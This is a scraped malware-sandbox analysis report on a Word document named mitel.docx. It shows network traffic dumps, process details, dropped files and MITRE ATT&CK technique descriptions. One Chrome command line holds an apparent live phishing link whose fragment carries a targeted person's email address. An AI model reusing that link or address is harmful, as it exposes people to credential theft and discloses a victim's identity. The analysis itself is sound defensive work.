2025-01-14 23:32:17 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 77 56 57 5a 53 37 49 57 59 55 36 53 6b 4d 35 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 39 64 36 38 36 66 32 63 37 39 62 36 31 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4c 37 44 41 61 77 73 33 79 66 47 52 39 6b 62 50 47 2f 35 72 6f 2f 58 58 4c 67 32 65 4c 73 36 30 74 6f 69 52 47 68 75 31 37 61 4f 34 67 56 43 49 71 37 6e 7a 77 30 6a 49 2f 69 5a 45 54 65 35 30 58 4b 71 58 69 66 63 2b 31 6a 4e 44 31 6b 35 55 41 4d 69 37 6c 4a 67 48 4e 63 7a 36 35 66 71 2f 32 73 72 5a 72 30 65 44 4b 4e 72 77 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: wVWZS7IWYU6SkM5p.2Context: 579d686f2c79b61b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdL7DAaws3yfGR9kbPG/5ro/XXLg2eLs60toiRGhu17aO4gVCIq7nzw0jI/iZETe50XKqXifc+1jND1k5UAMi7lJgHNcz65fq/2srZr0eDKNrw
2025-01-14 23:32:17 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 77 56 57 5a 53 37 49 57 59 55 36 53 6b 4d 35 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 39 64 36 38 36 66 32 63 37 39 62 36 31 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: wVWZS7IWYU6SkM5p.3Context: 579d686f2c79b61b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 23:32:17 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 23:32:17 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 64 72 49 56 71 64 39 70 4e 55 47 73 2b 4a 62 67 57 4f 46 50 36 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: drIVqd9pNUGs+JbgWOFP6g.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:33:04 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 53 69 43 66 56 48 73 78 6b 45 32 68 47 70 34 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 39 34 38 66 37 33 63 31 36 62 62 35 61 66 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: SiCfVHsxkE2hGp4/.1Context: 5948f73c16bb5af0
2025-01-14 23:33:04 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 23:33:04 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 53 69 43 66 56 48 73 78 6b 45 32 68 47 70 34 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 39 34 38 66 37 33 63 31 36 62 62 35 61 66 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4c 37 44 41 61 77 73 33 79 66 47 52 39 6b 62 50 47 2f 35 72 6f 2f 58 58 4c 67 32 65 4c 73 36 30 74 6f 69 52 47 68 75 31 37 61 4f 34 67 56 43 49 71 37 6e 7a 77 30 6a 49 2f 69 5a 45 54 65 35 30 58 4b 71 58 69 66 63 2b 31 6a 4e 44 31 6b 35 55 41 4d 69 37 6c 4a 67 48 4e 63 7a 36 35 66 71 2f 32 73 72 5a 72 30 65 44 4b 4e 72 77 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: SiCfVHsxkE2hGp4/.2Context: 5948f73c16bb5af0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdL7DAaws3yfGR9kbPG/5ro/XXLg2eLs60toiRGhu17aO4gVCIq7nzw0jI/iZETe50XKqXifc+1jND1k5UAMi7lJgHNcz65fq/2srZr0eDKNrw
2025-01-14 23:33:04 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 53 69 43 66 56 48 73 78 6b 45 32 68 47 70 34 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 39 34 38 66 37 33 63 31 36 62 62 35 61 66 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: SiCfVHsxkE2hGp4/.3Context: 5948f73c16bb5af0<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 23:33:04 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 23:33:04 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 45 78 48 41 47 78 68 38 54 30 43 71 30 44 64 39 58 4f 71 55 75 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: ExHAGxh8T0Cq0Dd9XOqUuw.0Payload parsing failed.

Target ID:	0
Start time:	18:29:51
Start date:	14/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x90000
File size:	1'620'872 bytes
MD5 hash:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	18:29:59
Start date:	14/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://app.supercast.com/ahoy/messages/IyOwn1xl2n6XdxToR2XV5dCRxhEvflsH/click?signature=96e743b76714148502315415a04739f234047e43&url=https://rubytech.xyz/0secure/index.html#ludmila.glinberg+mitel.com
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report mitel.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

QR Codes

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\~$mitel.docx

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\cr_en-us_500000_index.bin

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_1938143637\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\LICENSE

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_487111238\sets.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\LICENSE

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\keys.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_594061853\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\Google.Widevine.CDM.dll

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_689616758\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\Filtering Rules

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\LICENSE.txt

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping1924_872989902\manifest.json

Windows Analysis Report
mitel.docx

Target ID:	8
Start time:	18:30:00
Start date:	14/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2004,i,9731163135795558546,14858756652436041549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre